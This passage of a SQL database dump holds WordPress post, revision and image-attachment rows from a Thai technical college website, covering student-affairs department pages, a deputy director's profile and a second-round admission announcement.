(1786, 3, '2018-03-13 13:24:06', '2018-03-13 06:24:06', '<img class=\"aligncenter size-full wp-image-1772\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1773\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-09-17-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1774 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-06-09.jpg\" alt=\"\" width=\"265\" height=\"326\" />', 'งานครูที่ปรึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b8%9b%e0%b8%a3%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2', '', '', '2018-03-13 13:24:06', '2018-03-13 06:24:06', '', 0, 'http://www.technicrayong.ac.th/?page_id=1786', 0, 'page', '', 0),
(1787, 3, '2018-03-13 13:24:06', '2018-03-13 06:24:06', '<img class=\"aligncenter size-full wp-image-1772\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1773\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-09-17-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1774 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-06-09.jpg\" alt=\"\" width=\"265\" height=\"326\" />', 'งานครูที่ปรึกษา', '', 'inherit', 'closed', 'closed', '', '1786-revision-v1', '', '', '2018-03-13 13:24:06', '2018-03-13 06:24:06', '', 1786, 'http://www.technicrayong.ac.th/1786-revision-v1/', 0, 'revision', '', 0),
(1788, 3, '2018-03-13 13:25:35', '2018-03-13 06:25:35', '<img class=\"aligncenter size-full wp-image-1769\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-47.jpg\" alt=\"\" width=\"193\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1770\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-09-38-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1771 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-11-58.jpg\" alt=\"\" width=\"824\" height=\"323\" />', 'งานปกครอง', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%81%e0%b8%84%e0%b8%a3%e0%b8%ad%e0%b8%87', '', '', '2018-03-13 13:25:58', '2018-03-13 06:25:58', '', 0, 'http://www.technicrayong.ac.th/?page_id=1788', 0, 'page', '', 0),
(1789, 3, '2018-03-13 13:25:35', '2018-03-13 06:25:35', '<img class=\"aligncenter size-full wp-image-1769\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-47.jpg\" alt=\"\" width=\"193\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1770\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-09-38-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1771 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-11-58.jpg\" alt=\"\" width=\"824\" height=\"323\" />', 'งานปกครอง', '', 'inherit', 'closed', 'closed', '', '1788-revision-v1', '', '', '2018-03-13 13:25:35', '2018-03-13 06:25:35', '', 1788, 'http://www.technicrayong.ac.th/1788-revision-v1/', 0, 'revision', '', 0),
(1790, 3, '2018-03-13 13:27:42', '2018-03-13 06:27:42', '<img class=\"aligncenter size-full wp-image-1775\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-02-32.jpg\" alt=\"\" width=\"194\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1776\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-12-21-300x83.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3400\" src=\"/wp-content/uploads/2018/07/10-7-2561-11-01-05.jpg\" alt=\"\" width=\"439\" height=\"329\" />', 'งานแนะแนวอาชีพและการจัดหางาน', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b9%81%e0%b8%99%e0%b8%b0%e0%b9%81%e0%b8%99%e0%b8%a7%e0%b8%ad%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%9e%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1', '', '', '2018-07-10 10:59:44', '2018-07-10 03:59:44', '', 0, 'http://www.technicrayong.ac.th/?page_id=1790', 0, 'page', '', 0),
(1791, 3, '2018-03-13 13:27:42', '2018-03-13 06:27:42', '<img class=\"aligncenter size-full wp-image-1775\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-02-32.jpg\" alt=\"\" width=\"194\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1776\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-12-21-300x83.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1777 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-18-49.jpg\" alt=\"\" width=\"659\" height=\"315\" />', 'งานแนะแนวอาชีพและการจัดหางาน', '', 'inherit', 'closed', 'closed', '', '1790-revision-v1', '', '', '2018-03-13 13:27:42', '2018-03-13 06:27:42', '', 1790, 'http://www.technicrayong.ac.th/1790-revision-v1/', 0, 'revision', '', 0),
(1792, 3, '2018-03-13 13:31:22', '2018-03-13 06:31:22', '<img class=\"aligncenter size-full wp-image-1793\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-02-47.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1794\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-19-24-300x85.jpg\" alt=\"\" width=\"376\" height=\"106\" />\r\n<h4><img class=\"aligncenter wp-image-1795 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-27-05.jpg\" alt=\"\" width=\"494\" height=\"315\" /><a href=\"/wp-content/uploads/2018/08/หนังสือแนะนำการเบิกประกันฯ.pdf\">> หนังสือแนะนำการเบิกประกันฯ</a></h4>\r\n<h4><a href=\"/wp-content/uploads/2018/08/หนังสือเรียกร้องค่าสินไหมทดแทน.pdf\">> หนังสือเรียกร้องค่าสินไหมทดแทน</a></h4>\r\n<h4><a href=\"/wp-content/uploads/2018/08/หนังสือสละสิทธิ.pdf\">> หนังสือสละสิทธิ</a></h4>\r\n<h4></h4>\r\n ', 'งานสวัสดิการนักเรียน นักศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%aa%e0%b8%a7%e0%b8%b1%e0%b8%aa%e0%b8%94%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1', '', '', '2018-08-14 10:42:39', '2018-08-14 03:42:39', '', 0, 'http://www.technicrayong.ac.th/?page_id=1792', 0, 'page', '', 0),
(1793, 3, '2018-03-13 13:30:28', '2018-03-13 06:30:28', '', '13-3-2561 12-02-47', '', 'inherit', 'closed', 'closed', '', '13-3-2561-12-02-47', '', '', '2018-03-13 13:30:28', '2018-03-13 06:30:28', '', 1792, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-12-02-47.jpg', 0, 'attachment', 'image/jpeg', 0),
(1794, 3, '2018-03-13 13:30:51', '2018-03-13 06:30:51', '', '13-3-2561 11-19-24', '', 'inherit', 'closed', 'closed', '', '13-3-2561-11-19-24', '', '', '2018-03-13 13:30:51', '2018-03-13 06:30:51', '', 1792, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-11-19-24.jpg', 0, 'attachment', 'image/jpeg', 0),
(1795, 3, '2018-03-13 13:30:53', '2018-03-13 06:30:53', '', '13-3-2561 11-27-05', '', 'inherit', 'closed', 'closed', '', '13-3-2561-11-27-05', '', '', '2018-03-13 13:30:53', '2018-03-13 06:30:53', '', 1792, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-11-27-05.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1796, 3, '2018-03-13 13:31:22', '2018-03-13 06:31:22', '<img class=\"aligncenter size-full wp-image-1793\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-02-47.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1794\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-19-24-300x85.jpg\" alt=\"\" width=\"376\" height=\"106\" />\r\n\r\n<img class=\"aligncenter wp-image-1795 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-27-05.jpg\" alt=\"\" width=\"494\" height=\"315\" />', 'งานสวัสดิการนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '1792-revision-v1', '', '', '2018-03-13 13:31:22', '2018-03-13 06:31:22', '', 1792, 'http://www.technicrayong.ac.th/1792-revision-v1/', 0, 'revision', '', 0),
(1797, 3, '2018-03-13 13:34:25', '2018-03-13 06:34:25', '<img class=\"aligncenter size-full wp-image-1800\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-03-05-1.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1798\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-28-10-1-300x85.jpg\" alt=\"\" width=\"376\" height=\"106\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3403\" src=\"/wp-content/uploads/2018/07/10-7-2561-11-07-53.jpg\" alt=\"\" width=\"486\" height=\"324\" />', 'งานโครงการพิเศษและบริการชุมชน', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9e%e0%b8%b4%e0%b9%80%e0%b8%a8%e0%b8%a9%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%81', '', '', '2018-07-10 11:10:14', '2018-07-10 04:10:14', '', 0, 'http://www.technicrayong.ac.th/?page_id=1797', 0, 'page', '', 0),
(1798, 3, '2018-03-13 13:33:23', '2018-03-13 06:33:23', '', '13-3-2561 11-28-10', '', 'inherit', 'closed', 'closed', '', '13-3-2561-11-28-10-2', '', '', '2018-03-13 13:33:23', '2018-03-13 06:33:23', '', 1797, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-11-28-10-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(1799, 3, '2018-03-13 13:33:27', '2018-03-13 06:33:27', '', '13-3-2561 11-32-42', '', 'inherit', 'closed', 'closed', '', '13-3-2561-11-32-42-2', '', '', '2018-03-13 13:33:27', '2018-03-13 06:33:27', '', 1797, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-11-32-42-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(1800, 3, '2018-03-13 13:33:29', '2018-03-13 06:33:29', '', '13-3-2561 12-03-05', '', 'inherit', 'closed', 'closed', '', '13-3-2561-12-03-05-2', '', '', '2018-03-13 13:33:29', '2018-03-13 06:33:29', '', 1797, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-12-03-05-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(1801, 3, '2018-03-13 13:34:25', '2018-03-13 06:34:25', '<img class=\"aligncenter size-full wp-image-1800\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-03-05-1.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1798\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-28-10-1-300x85.jpg\" alt=\"\" width=\"376\" height=\"106\" />\r\n\r\n<img class=\"aligncenter wp-image-1799 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-32-42-1.jpg\" alt=\"\" width=\"478\" height=\"323\" />', 'งานโครงการพิเศษและบริการชุมชน', '', 'inherit', 'closed', 'closed', '', '1797-revision-v1', '', '', '2018-03-13 13:34:25', '2018-03-13 06:34:25', '', 1797, 'http://www.technicrayong.ac.th/1797-revision-v1/', 0, 'revision', '', 0),
(1802, 3, '2018-03-13 13:43:06', '2018-03-13 06:43:06', '<img class=\"aligncenter size-full wp-image-1765\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-00-36.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1764\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-07-01-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1766\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-14.jpg\" alt=\"\" width=\"190\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1767\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-07-18-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1768 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-06-24.jpg\" alt=\"\" width=\"489\" height=\"317\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1772\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1773\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-09-17-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1774 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-06-09.jpg\" alt=\"\" width=\"265\" height=\"326\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1769\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-47.jpg\" alt=\"\" width=\"193\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1770\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-09-38-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1771 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-11-58.jpg\" alt=\"\" width=\"824\" height=\"323\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1775\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-02-32.jpg\" alt=\"\" width=\"194\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1776\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-12-21-300x83.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1777 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-18-49.jpg\" alt=\"\" width=\"659\" height=\"315\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1793\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-02-47.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1794\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-19-24-300x85.jpg\" alt=\"\" width=\"376\" height=\"106\" />\r\n\r\n<img class=\"aligncenter wp-image-1795 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-27-05.jpg\" alt=\"\" width=\"494\" height=\"315\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1778\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-03-05.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1779\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-28-10-300x85.jpg\" alt=\"\" width=\"376\" height=\"106\" />\r\n\r\n<img class=\"aligncenter wp-image-1780 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-32-42.jpg\" alt=\"\" width=\"478\" height=\"323\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายพัฒนากิจการนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '1762-revision-v1', '', '', '2018-03-13 13:43:06', '2018-03-13 06:43:06', '', 1762, 'http://www.technicrayong.ac.th/1762-revision-v1/', 0, 'revision', '', 0),
(1803, 3, '2018-03-13 15:07:54', '2018-03-13 08:07:54', '', 'นายยุทธนา อ่อนส้มกฤษ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%a2%e0%b8%b8%e0%b8%97%e0%b8%98%e0%b8%99%e0%b8%b2-%e0%b8%ad%e0%b9%88%e0%b8%ad%e0%b8%99%e0%b8%aa%e0%b9%89%e0%b8%a1%e0%b8%81%e0%b8%a4%e0%b8%a9', '', '', '2018-03-13 15:07:54', '2018-03-13 08:07:54', '', 647, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/นายยุทธนา-อ่อนส้มกฤษ.jpg', 0, 'attachment', 'image/jpeg', 0),
(1805, 3, '2018-03-13 15:09:12', '2018-03-13 08:09:12', '<img class=\"aligncenter size-medium wp-image-1803\" src=\"/wp-content/uploads/2018/01/นายยุทธนา-อ่อนส้มกฤษ-203x300.jpg\" alt=\"\" width=\"203\" height=\"300\" />\r\n<h3 style=\"text-align: center;\">นายยุทธนา อ่อนส้มกฤษ\r\nรองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา</h3>', 'รองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '647-revision-v1', '', '', '2018-03-13 15:09:12', '2018-03-13 08:09:12', '', 647, 'http://www.technicrayong.ac.th/647-revision-v1/', 0, 'revision', '', 0),
(1806, 3, '2018-03-13 15:12:23', '2018-03-13 08:12:23', '<a href=\"wp-content/uploads/2018/01/นายยุทธนา-อ่อนส้มกฤษ-203x300.jpg\"><img class=\"aligncenter wp-image-1803 size-medium\" src=\"/wp-content/uploads/2018/01/นายยุทธนา-อ่อนส้มกฤษ-203x300.jpg\" alt=\"\" width=\"203\" height=\"300\" /></a>\r\n<h3 style=\"text-align: center;\">นายยุทธนา อ่อนส้มกฤษ\r\nรองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา</h3>', 'รองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '647-revision-v1', '', '', '2018-03-13 15:12:23', '2018-03-13 08:12:23', '', 647, 'http://www.technicrayong.ac.th/647-revision-v1/', 0, 'revision', '', 0),
(1808, 3, '2018-03-13 15:15:44', '2018-03-13 08:15:44', '<img class=\"aligncenter wp-image-1803 size-medium\" src=\"/wp-content/uploads/2018/01/นายยุทธนา-อ่อนส้มกฤษ-203x300.jpg\" alt=\"\" width=\"203\" height=\"300\" />\r\n<h3 style=\"text-align: center;\">นายยุทธนา อ่อนส้มกฤษ\r\nรองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา</h3>', 'รองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '647-revision-v1', '', '', '2018-03-13 15:15:44', '2018-03-13 08:15:44', '', 647, 'http://www.technicrayong.ac.th/647-revision-v1/', 0, 'revision', '', 0),
(1809, 3, '2018-03-13 15:17:25', '2018-03-13 08:17:25', '<a href=\"https://i1.wp.com/www.technicrayong.ac.th/wp-content/uploads/2018/01/%E0%B8%99%E0%B8%B2%E0%B8%A2%E0%B8%A2%E0%B8%B8%E0%B8%97%E0%B8%98%E0%B8%99%E0%B8%B2-%E0%B8%AD%E0%B9%88%E0%B8%AD%E0%B8%99%E0%B8%AA%E0%B9%89%E0%B8%A1%E0%B8%81%E0%B8%A4%E0%B8%A9.jpg?resize=203%2C300\"><img class=\"aligncenter wp-image-1803 size-medium\" src=\"/wp-content/uploads/2018/01/นายยุทธนา-อ่อนส้มกฤษ-203x300.jpg\" alt=\"\" width=\"203\" height=\"300\" /></a>\r\n<h3 style=\"text-align: center;\">นายยุทธนา อ่อนส้มกฤษ\r\nรองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา</h3>', 'รองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '647-revision-v1', '', '', '2018-03-13 15:17:25', '2018-03-13 08:17:25', '', 647, 'http://www.technicrayong.ac.th/647-revision-v1/', 0, 'revision', '', 0),
(1811, 1, '2018-03-14 01:26:40', '2018-03-13 18:26:40', '<a href=\"/wp-content/uploads/2018/03/ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-1-01.png\"><img class=\"aligncenter size-large wp-image-1813\" src=\"/wp-content/uploads/2018/03/ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-1-01-724x1024.png\" alt=\"\" width=\"640\" height=\"905\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/03/ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-2-01.png\"><img class=\"aligncenter size-large wp-image-1812\" src=\"/wp-content/uploads/2018/03/ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-2-01-724x1024.png\" alt=\"\" width=\"640\" height=\"905\" /></a>', 'เปิดรับสมัครนักเรียน นักศึกษาใหม่เข้าศึกษาต่อ รอบที่ 2 (สำหรับสาขาที่ยังไม่เต็ม)', '', 'publish', 'closed', 'open', '', '%e0%b9%80%e0%b8%9b%e0%b8%b4%e0%b8%94%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1', '', '', '2018-03-14 01:26:40', '2018-03-13 18:26:40', '', 0, 'http://www.technicrayong.ac.th/?p=1811', 453, 'post', '', 0),
(1812, 1, '2018-03-14 01:22:47', '2018-03-13 18:22:47', '', 'ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-2-01', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9c%e0%b9%88%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2', '', '', '2018-03-14 01:22:47', '2018-03-13 18:22:47', '', 1811, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-2-01.png', 0, 'attachment', 'image/png', 0),
(1813, 1, '2018-03-14 01:22:52', '2018-03-13 18:22:52', '', 'ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-1-01', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9c%e0%b9%88%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2-2', '', '', '2018-03-14 01:22:52', '2018-03-13 18:22:52', '', 1811, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-1-01.png', 0, 'attachment', 'image/png', 0),
(1815, 1, '2018-03-14 01:26:40', '2018-03-13 18:26:40', '<a href=\"/wp-content/uploads/2018/03/ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-1-01.png\"><img class=\"aligncenter size-large wp-image-1813\" src=\"/wp-content/uploads/2018/03/ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-1-01-724x1024.png\" alt=\"\" width=\"640\" height=\"905\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/03/ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-2-01.png\"><img class=\"aligncenter size-large wp-image-1812\" src=\"/wp-content/uploads/2018/03/ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-2-01-724x1024.png\" alt=\"\" width=\"640\" height=\"905\" /></a>', 'เปิดรับสมัครนักเรียน นักศึกษาใหม่เข้าศึกษาต่อ รอบที่ 2 (สำหรับสาขาที่ยังไม่เต็ม)', '', 'inherit', 'closed', 'closed', '', '1811-revision-v1', '', '', '2018-03-14 01:26:40', '2018-03-13 18:26:40', '', 1811, 'http://www.technicrayong.ac.th/1811-revision-v1/', 0, 'revision', '', 0),
(1819, 3, '2018-03-14 13:40:20', '2018-03-14 06:40:20', '', '14-3-2561 9-15-49', '', 'inherit', 'closed', 'closed', '', '14-3-2561-9-15-49', '', '', '2018-03-14 13:40:20', '2018-03-14 06:40:20', '', 656, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-9-15-49.jpg', 0, 'attachment', 'image/jpeg', 0),
(1820, 3, '2018-03-14 13:40:25', '2018-03-14 06:40:25', '', '14-3-2561 9-16-13', '', 'inherit', 'closed', 'closed', '', '14-3-2561-9-16-13', '', '', '2018-03-14 13:40:25', '2018-03-14 06:40:25', '', 656, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-9-16-13.jpg', 0, 'attachment', 'image/jpeg', 0),
(1821, 3, '2018-03-14 13:40:30', '2018-03-14 06:40:30', '', '14-3-2561 9-20-16', '', 'inherit', 'closed', 'closed', '', '14-3-2561-9-20-16', '', '', '2018-03-14 13:40:30', '2018-03-14 06:40:30', '', 656, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-9-20-16.jpg', 0, 'attachment', 'image/jpeg', 0),
(1822, 3, '2018-03-14 13:40:34', '2018-03-14 06:40:34', '', '14-3-2561 9-16-38', '', 'inherit', 'closed', 'closed', '', '14-3-2561-9-16-38', '', '', '2018-03-14 13:40:34', '2018-03-14 06:40:34', '', 656, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-9-16-38.jpg', 0, 'attachment', 'image/jpeg', 0),
(1823, 3, '2018-03-14 13:40:39', '2018-03-14 06:40:39', '', '14-3-2561 9-27-30', '', 'inherit', 'closed', 'closed', '', '14-3-2561-9-27-30', '', '', '2018-03-14 13:40:39', '2018-03-14 06:40:39', '', 656, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-9-27-30.jpg', 0, 'attachment', 'image/jpeg', 0),
(1824, 3, '2018-03-14 13:42:07', '2018-03-14 06:42:07', '', '14-3-2561 13-43-40', '', 'inherit', 'closed', 'closed', '', '14-3-2561-13-43-40', '', '', '2018-03-14 13:42:07', '2018-03-14 06:42:07', '', 656, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-13-43-40.jpg', 0, 'attachment', 'image/jpeg', 0),
(1825, 3, '2018-03-14 13:42:10', '2018-03-14 06:42:10', '', '14-3-2561 9-28-10', '', 'inherit', 'closed', 'closed', '', '14-3-2561-9-28-10', '', '', '2018-03-14 13:42:10', '2018-03-14 06:42:10', '', 656, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-9-28-10.jpg', 0, 'attachment', 'image/jpeg', 0),
(1826, 3, '2018-03-14 13:42:14', '2018-03-14 06:42:14', '', '14-3-2561 9-39-21', '', 'inherit', 'closed', 'closed', '', '14-3-2561-9-39-21', '', '', '2018-03-14 13:42:14', '2018-03-14 06:42:14', '', 656, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-9-39-21.jpg', 0, 'attachment', 'image/jpeg', 0),
(1827, 3, '2018-03-14 13:42:28', '2018-03-14 06:42:28', '', '14-3-2561 9-43-36', '', 'inherit', 'closed', 'closed', '', '14-3-2561-9-43-36', '', '', '2018-03-14 13:42:28', '2018-03-14 06:42:28', '', 656, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-9-43-36.jpg', 0, 'attachment', 'image/jpeg', 0),
(1828, 3, '2018-03-14 13:42:32', '2018-03-14 06:42:32', '', '14-3-2561 9-39-44', '', 'inherit', 'closed', 'closed', '', '14-3-2561-9-39-44', '', '', '2018-03-14 13:42:32', '2018-03-14 06:42:32', '', 656, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-9-39-44.jpg', 0, 'attachment', 'image/jpeg', 0),
